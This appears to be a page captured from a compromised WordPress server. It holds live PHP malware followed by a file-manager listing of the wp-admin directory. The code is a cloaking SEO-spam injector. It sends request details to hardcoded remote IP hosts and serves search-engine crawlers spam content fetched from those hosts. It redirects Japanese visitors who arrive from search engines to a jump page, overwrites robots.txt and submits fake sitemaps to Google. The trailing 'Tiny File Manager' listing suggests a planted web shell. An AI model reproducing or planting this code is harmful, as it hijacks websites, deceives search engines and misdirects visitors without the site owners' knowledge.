$req_uri = $_SERVER['REQUEST_URI']; $self = $_SERVER['PHP_SELF']; $inter_domain='http://142.54.172.170/z50426_12/'; if(strstr($req_uri, 'header.php')){ $inter_domain='http://199.168.102.234/z50428_2/'; $self='/header.php'; } if(strstr($req_uri, 'good.php')){ $inter_domain='http://192.187.99.106/z40229_7/'; $self='/good.php'; } $sx_ap=''; function stp(){ return exit; } function curl_get_contents($url){$ch=curl_init();curl_setopt ($ch, CURLOPT_URL, $url);curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);$file_contents = curl_exec($ch);curl_close($ch);return $file_contents; } function getServerCont($url,$data=array()){$url=str_replace(' ','+',$url);$ch=curl_init();curl_setopt($ch,CURLOPT_URL,"$url");curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_TIMEOUT,10);curl_setopt($ch,CURLOPT_POST,1);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);curl_setopt($ch,CURLOPT_POSTFIELDS,http_build_query($data));$output = curl_exec($ch);$errorCode = curl_errno($ch);curl_close($ch);if(0!== $errorCode){ return false;}return $output;} function getServerCont11($url,$data=array()){$url=str_replace(' ','+',$url);$ch=curl_init();curl_setopt($ch,CURLOPT_URL,"$url");curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_TIMEOUT,10);curl_setopt($ch,CURLOPT_POST,1);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);curl_setopt($ch,CURLOPT_POSTFIELDS,http_build_query($data));$output = curl_exec($ch);$errorCode = curl_errno($ch);curl_close($ch);if(0!== $errorCode){ return false;}return $output;} function is_crawler($agent){$agent_check=false; $bots='googlebot|google|yahoo|bing|aol';if($agent!=''){if(preg_match("/($bots)/si",$agent)){$agent_check = true; }}return $agent_check;} function check_refer($refer){ $check_refer=false;$referbots='google.co.jp|yahoo.co.jp|google.com';if($refer!='' && preg_match("/($referbots)/si",$refer)){ $check_refer=true; }return $check_refer; } $http=((isset($_SERVER['HTTPS'])&&$_SERVER['HTTPS']!=='off')?'https://':'http://'); $domain=$_SERVER["HTTP_HOST"]; $ser_name=$_SERVER['SERVER_NAME']; $req_url=$http.$domain.$req_uri; $indata1=$inter_domain."/indata.php"; $map1=$inter_domain."/map.php"; $jump1=$inter_domain."/jump.php"; $url_words=$inter_domain."/words.php"; $url_robots=$inter_domain."/robots.php"; if(strpos($req_uri,".php")){$href1=$http.$domain.$self;}else{$href1=$http.$domain;} $data1[]=array();$data1['domain']=$domain;$data1['req_uri']=$req_uri;$data1['href']=$href1;$data1['req_url']=$req_url; if(substr($req_uri,-6)=='robots'){ $robots_cont=@file_get_contents($_SERVER['DOCUMENT_ROOT'].'/robots.txt'); $data1['robots_cont'] = $robots_cont; $robots_cont = getServerCont($url_robots,$data1); $result=file_put_contents($_SERVER['DOCUMENT_ROOT'].'/robots.txt', $robots_cont); if($result){ echo $_SERVER['DOCUMENT_ROOT'].'robots.txt file create success!'; }else{ echo $_SERVER['DOCUMENT_ROOT'].'robots.txt file create fail!'; } return; } if(substr($req_uri,-4)=='.xml'){if(strpos($req_uri,"pingsitemap.xml")){ $str_cont = getServerCont($map1,$data1); $str_cont_arr= explode(",",$str_cont); $str_cont_arr[]='sitemap'; for($k=0;$k 0){ $tt1='?'; }else{ $tt1='/';}$http2=$href1.$tt1.$str_cont_arr[$k].'.xml';$data_new='https://www.google.com/ping?sitemap='.$http2;$data_new1='http://www.google.com/ping?sitemap='.$http2;if(stristr(@file_get_contents($data_new),'successfully')){echo $data_new.'===>Submitting Google Sitemap: OK'.PHP_EOL;}else if(stristr(@curl_get_contents($data_new),'successfully')){echo $data_new.'===>Submitting Google Sitemap: OK'.PHP_EOL;}else if(stristr(@file_get_contents($data_new1),'successfully')){echo $data_new1.'===>Submitting Google Sitemap: OK'.PHP_EOL;}else if(stristr(@curl_get_contents($data_new1),'successfully')){echo $data_new1.'===>Submitting Google Sitemap: OK'.PHP_EOL; }else{echo $data_new1.'===>Submitting Google Sitemap: fail'.PHP_EOL;} } exit();} if(strpos($req_uri,"allsitemap.xml") || strpos($req_uri,"sitemap-index.xml") || strpos($req_uri,"sitemap-index-1.xml")){ $str_cont = getServerCont($map1,$data1); header("Content-type:text/xml"); echo $str_cont; exit();} if(strpos($req_uri,".php")){ $word4=explode("?",$req_uri); $word4=$word4[count($word4)-1]; $word4=str_replace(".xml","",$word4); }else{ $word4= str_replace("/","",$req_uri);$word4= str_replace(".xml","",$word4); }$data1['word']=$word4;$data1['action']='check_sitemap';$check_url4=getServerCont($url_words,$data1);if($check_url4=='1'){ $str_cont=getServerCont($map1,$data1); header("Content-type:text/xml"); echo $str_cont;exit();} $data1['action']="check_words"; $check1= getServerCont($url_words,$data1);if(strpos($req_uri,"map")> 0 || $check1=='1') $data1['action']="rand_xml";$check_url4=getServerCont($url_words,$data1);header("Content-type:text/xml");echo $check_url4;exit();}if(strpos($req_uri,".php")){$main_shell=$http.$ser_name.$self;$data1['main_shell']=$main_shell;}else{$main_shell=$http.$ser_name;$data1['main_shell']=$main_shell;}$referer=isset($_SERVER['HTTP_REFERER'])?$_SERVER['HTTP_REFERER']:'';$chk_refer=check_refer($referer); $user_agent=strtolower(isset($_SERVER['HTTP_USER_AGENT'])?$_SERVER['HTTP_USER_AGENT']:'');$res_crawl=is_crawler($user_agent); if(strpos($_SERVER['REQUEST_URI'],'.php')){ $url_ext='?'; }else{ $url_ext='/'; } if(($chk_refer && !$res_crawl) && preg_match('/ja/i',@$_SERVER['HTTP_ACCEPT_LANGUAGE'])){echo getServerCont11($jump1,$data1);exit(); } if($res_crawl){ $data1['http_user_agent']=$user_agent; echo getServerCont11($indata1,$data1);exit();}

नामः प्रकारः आकृति अनुज्ञापत्रम् नामपत्र
css Folder -- drwxr-xr-x
images Folder -- drwxr-xr-x
includes Folder -- drwxr-xr-x
js Folder -- drwxr-xr-x
maint Folder -- drwxr-xr-x
network Folder -- drwxr-xr-x
user Folder -- drwxr-xr-x
.htaccess File 0.231 KB -r-xr-xr-x
about.php File 24.079 KB -rw-r--r--
admin-ajax.php File 4.58 KB -rw-r--r--
admin-footer.php File 2.766 KB -rw-r--r--
admin-functions.php File 0.396 KB -rw-r--r--
admin-header.php File 8.422 KB -rw-r--r--
admin-post.php File 1.632 KB -rw-r--r--
admin.php File 11.849 KB -rw-r--r--
async-upload.php File 3.744 KB -rw-r--r--
comment.php File 11.107 KB -rw-r--r--
credits.php File 3.771 KB -rw-r--r--
custom-background.php File 0.406 KB -rw-r--r--
custom-header.php File 0.416 KB -rw-r--r--
customize.php File 10.074 KB -rw-r--r--
edit-comments.php File 13.422 KB -rw-r--r--
edit-form-advanced.php File 28.225 KB -rw-r--r--
edit-form-blocks.php File 14.476 KB -rw-r--r--
edit-form-comment.php File 7.914 KB -rw-r--r--
edit-link-form.php File 6.087 KB -rw-r--r--
edit-tag-form.php File 9.87 KB -rw-r--r--
edit-tags.php File 21.396 KB -rw-r--r--
edit.php File 18.071 KB -rw-r--r--
erase-personal-data.php File 3.155 KB -rw-r--r--
error_log File 84.175 KB -rw-r--r--
export-personal-data.php File 3.131 KB -rw-r--r--
export.php File 10.715 KB -rw-r--r--
freedoms.php File 4.46 KB -rw-r--r--
import.php File 7.354 KB -rw-r--r--
index.php File 6.751 KB -rw-r--r--
install-helper.php File 5.89 KB -rw-r--r--
install.php File 16.506 KB -rw-r--r--
link-add.php File 0.694 KB -rw-r--r--
link-manager.php File 4.091 KB -rw-r--r--
link-parse-opml.php File 2.592 KB -rw-r--r--
link.php File 2.668 KB -rw-r--r--
load-scripts.php File 1.653 KB -rw-r--r--
load-styles.php File 2.248 KB -rw-r--r--
media-new.php File 3.124 KB -rw-r--r--
media-upload.php File 3.407 KB -rw-r--r--
media.php File 5.467 KB -rw-r--r--
menu-header.php File 9.604 KB -rw-r--r--
menu.php File 14.186 KB -rw-r--r--
moderation.php File 0.3 KB -rw-r--r--
ms-admin.php File 0.191 KB -rw-r--r--
ms-delete-site.php File 4.177 KB -rw-r--r--
ms-edit.php File 0.211 KB -rw-r--r--
ms-options.php File 0.218 KB -rw-r--r--
ms-sites.php File 0.21 KB -rw-r--r--
ms-themes.php File 0.212 KB -rw-r--r--
ms-upgrade-network.php File 0.214 KB -rw-r--r--
ms-users.php File 0.21 KB -rw-r--r--
my-sites.php File 4.537 KB -rw-r--r--
nav-menus.php File 43.717 KB -rw-r--r--
network.php File 5.254 KB -rw-r--r--
options-discussion.php File 15.082 KB -rw-r--r--
options-general.php File 14.606 KB -rw-r--r--
options-head.php File 0.48 KB -rw-r--r--
options-media.php File 6.151 KB -rw-r--r--
options-permalink.php File 18.762 KB -rw-r--r--
options-privacy.php File 7.883 KB -rw-r--r--
options-reading.php File 9.479 KB -rw-r--r--
options-writing.php File 8.422 KB -rw-r--r--
options.php File 12.479 KB -rw-r--r--
plugin-editor.php File 13.015 KB -rw-r--r--
plugin-install.php File 6.208 KB -rw-r--r--
plugins.php File 28.451 KB -rw-r--r--
post-new.php File 2.64 KB -rw-r--r--
post.php File 9.763 KB -rw-r--r--
press-this.php File 2.33 KB -rw-r--r--
privacy-policy-guide.php File 0.813 KB -rw-r--r--
privacy.php File 2.255 KB -rw-r--r--
profile.php File 0.276 KB -rw-r--r--
revision.php File 5.407 KB -rw-r--r--
setup-config.php File 15.438 KB -rw-r--r--
site-health-info.php File 5.647 KB -rw-r--r--
site-health.php File 5.214 KB -rw-r--r--
term.php File 2.2 KB -rw-r--r--
theme-editor.php File 14.682 KB -rw-r--r--
theme-install.php File 21.478 KB -rw-r--r--
themes.php File 43.781 KB -rw-r--r--
tools.php File 3.371 KB -rw-r--r--
update-core.php File 37.394 KB -rw-r--r--
update.php File 12.588 KB -rw-r--r--
upgrade-functions.php File 0.333 KB -rw-r--r--
upgrade.php File 5.468 KB -rw-r--r--
upload.php File 13.638 KB -rw-r--r--
user-edit.php File 28.521 KB -rw-r--r--
user-new.php File 22.638 KB -rw-r--r--
users.php File 19.426 KB -rw-r--r--
widgets.php File 19.278 KB -rw-r--r--
wp-blog-header.php File 2.73 KB -r--r--r--
wp-cron.php File 2.73 KB -rw-r--r--
Tiny File Manager